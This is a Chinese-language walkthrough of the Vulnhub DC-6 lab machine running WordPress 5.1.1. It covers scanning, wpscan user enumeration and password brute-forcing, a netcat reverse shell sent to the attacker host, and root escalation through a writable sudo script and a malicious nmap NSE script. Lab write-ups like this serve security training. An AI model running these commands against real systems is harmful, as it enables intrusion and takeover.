DC-6 靶场渗透测试详细教程

靶机信息

• 靶机IP: 192.168.168.4
• 攻击机(Kali)IP: 192.168.168.5
• 目标系统: WordPress 5.1.1

信息收集阶段

1. 主机发现

arp-scan -l
# 或
nmap -sn 192.168.168.0/24

2. 端口扫描与服务识别

nmap -sV -A 192.168.168.4

发现开放端口:

• SSH (22/tcp)
• HTTP (80/tcp) - WordPress 5.1.1

3. 解决域名解析问题

访问80端口会跳转到"wordy"域名，需要修改hosts文件:

sudo vim /etc/hosts

添加:

192.168.168.4 wordy

WordPress站点测试

1. 初始扫描

wpscan --url wordy

2. 根据提示生成密码字典

Vulnhub提示:

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

3. 枚举用户名

wpscan --url wordy -e u

4. 密码爆破

wpscan --url wordy -U username.txt -P passwords.txt

注意: 爆破出的密码不是SSH密码

5. 目录扫描

dirsearch -u wordy

获取初始访问

1. 登录WordPress后台

使用爆破出的凭证登录WordPress后台

2. 命令执行

在后台找到可以执行命令的地方，绕过前端验证后执行:

nc -e /bin/bash 192.168.168.5 8888

攻击机监听:

nc -lvvp 8888

权限提升

1. 发现用户密码

在mark用户目录下发现另一个用户的密码

2. SSH登录

使用发现的密码通过SSH登录

3. 检查sudo权限

sudo -l

发现可以免密以jens用户执行/home/jens/backups.sh

4. 利用备份脚本

echo "/bin/bash" > /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

5. 进一步提权

检查jens用户的sudo权限:

sudo -l

发现可以以root身份免密运行nmap

6. 利用nmap提权

nmap可以调用第三方脚本，创建一个恶意脚本:

echo 'os.execute("/bin/bash")' > /tmp/root.nse
sudo nmap --script=/tmp/root.nse

总结

整个渗透测试流程:

1. 信息收集 → 2. WordPress扫描 → 3. 密码爆破 → 4. 后台命令执行 → 5. 横向移动 → 6. 权限提升

关键点:

• 注意Vulnhub提供的提示信息
• 利用WordPress后台漏洞获取初始shell
• 通过sudo权限检查发现提权路径
• 利用nmap的脚本执行功能获取root权限